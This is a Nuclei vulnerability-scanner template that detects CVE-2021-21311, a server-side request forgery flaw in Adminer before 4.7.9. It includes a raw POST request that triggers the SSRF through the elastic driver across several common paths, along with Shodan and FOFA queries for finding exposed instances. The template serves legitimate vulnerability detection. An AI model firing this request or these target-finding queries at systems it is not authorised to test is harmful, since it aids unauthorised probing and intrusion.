nuclei-templates/http/cves/2021/CVE-2021-21311.yaml

62 lines
2.1 KiB
YAML

id: CVE-2021-21311
info:
name: Adminer <4.7.9 - Server-Side Request Forgery
author: Adam Crosser,pwnhxl
severity: high
description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://packagist.org/packages/vrana/adminer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
remediation: Upgrade to version 4.7.9 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2021-21311
cwe-id: CWE-918
epss-score: 0.00278
metadata:
max-request: 6
fofa-query: app="Adminer" && body="4.7.8"
hunter-query: app.name="Adminer"&&web.body="4.7.8"
shodan-query: title:"Login - Adminer"
tags: cve,cve2021,adminer,ssrf
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}
redirects: true
max-redirects: 1
cookie-reuse: true
attack: batteringram
payloads:
path:
- "/index.php"
- "/adminer.php"
- "/adminer/adminer.php"
- "/adminer/index.php"
- "/_adminer.php"
- "/_adminer/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>400 - Bad Request</title>"
- "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
condition: or
- type: status
status:
- 403